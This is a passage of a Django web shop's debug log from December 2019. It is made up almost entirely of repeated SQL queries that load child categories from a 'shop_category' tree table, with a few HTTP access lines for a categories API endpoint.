"shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:18:24,979 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:18:24,982 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:18:24,985 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:18:24,987 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:18:24] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 13:21:56] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 13:22:26,732 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:22:26,739 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:22:26,743 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:22:26,745 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:22:26,749 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:22:26,751 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:22:26,754 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:22:26,756 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:22:26,758 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:22:26,761 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:22:26,763 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:22:26,765 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:22:26,768 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:22:26,770 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:22:26,773 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:22:26,777 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:22:26,779 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:22:26,781 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:22:26,784 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:22:26,787 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:22:26,789 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:22:26,791 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:22:26,794 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:22:26,796 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:22:26,798 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:22:26,801 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:22:26,804 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:22:26,806 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:22:26,808 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:22:26,812 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:22:26,816 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:22:26,819 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:22:26,821 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:22:26,823 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:22:26,825 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:22:26,829 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:22:26,831 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:22:26,833 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:22:26,835 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:22:26,837 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:22:26,839 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:22:26,842 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:22:26,844 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:22:26,847 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:22:26,849 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:22:26,852 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:22:26] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:22:27,148 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:22:27,155 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:22:27,159 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:22:27,161 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:22:27,165 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:22:27,167 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:22:27,169 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:22:27,171 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:22:27,174 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:22:27,177 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:22:27,179 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:22:27,181 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:22:27,183 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:22:27,185 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:22:27,189 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:22:27,191 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:22:27,193 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", 